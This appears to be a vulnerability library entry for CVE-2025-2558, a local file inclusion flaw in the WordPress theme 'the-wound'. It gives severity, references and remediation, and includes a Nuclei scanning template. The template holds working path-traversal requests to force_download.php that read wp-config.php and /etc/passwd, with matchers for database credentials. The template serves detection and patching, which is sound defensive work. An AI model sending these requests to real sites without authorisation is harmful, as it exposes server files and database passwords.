/Vulnerability Library

WordPress The Wound Theme <= 0.0.1 - Local File Inclusion

CVE-2025-2558
Verified

Description

The-wound WordPress theme through 0.0.1 contains a local file inclusion caused by insufficient validation of parameters used to generate paths passed to include functions, letting unauthenticated users perform LFI attacks and download arbitrary files from the server.

Severity

High

CVSS Score

8.6

Affected Product

the-wound

Published Date

April 9, 2026

Template Author

pussycat0x

CVE-2025-2558.yaml
id: CVE-2025-2558

info:
  name: WordPress The Wound Theme <= 0.0.1 - Local File Inclusion
  author: pussycat0x
  severity: high
  description: |
    The-wound WordPress theme through 0.0.1 contains a local file inclusion caused by insufficient validation of parameters used to generate paths passed to include functions, letting unauthenticated users perform LFI attacks and download arbitrary files from the server.
  impact: |
    Unauthenticated attackers can include arbitrary local files, potentially leading to information disclosure or remote code execution.
  remediation: |
    Update to the latest version of the theme where the issue is fixed or apply security patches that validate parameters properly.
  reference:
    - https://wpscan.com/vulnerability/6a8e1c89-a01d-4347-91fc-ba454784b153/
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/the-wound/the-wound-001-unauthenticated-local-file-inclusion
    - https://nvd.nist.gov/vuln/detail/cve-2025-2558
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cwe-id: CWE-98
  metadata:
    verified: true
    max-request: 3
    vendor: developer
    product: the-wound
    shodan-query: http.component:"WordPress"
  tags: cve,cve2025,wordpress,wp-theme,lfi,the-wound,wpscan,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/themes/the-wound/style.css'

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "compare_versions(version, '<= 0.0.1')"
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        name: version
        group: 1
        regex:
          - 'Version: ([0-9.]+)'
        internal: true

  - method: GET
    path:
      - '{{BaseURL}}/wp-content/themes/the-wound/force_download.php?file=../../../wp-config.php'
      - '{{BaseURL}}/wp-content/themes/the-wound/force_download.php?file=/etc/passwd'

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "regex('root:.*:0:0:', body)"
        condition: and

      - type: dsl
        dsl:
          - "status_code == 200"
          - contains_all(body, "DB_NAME", "DB_PASSWORD")
        condition: and
# digest: 4a0a0047304502206d7f1d4cbd5f40e1528a30f0d9e831c3dc8466e5cf5c005c4cf334b9e98a2a51022100c2cabfc9f173230bc8653eb737251f501a31caad436d08ddcc3dd73b4f97352c:922c64590222798bb761d5b6d8e72950
8.6Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
CWE ID:
cwe-98

References

https://wpscan.com/vulnerability/6a8e1c89-a01d-4347-91fc-ba454784b153/https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/the-wound/the-wound-001-unauthenticated-local-file-inclusionhttps://nvd.nist.gov/vuln/detail/cve-2025-2558

Remediation Steps

Update to the latest version of the theme where the issue is fixed or apply security patches that validate parameters properly.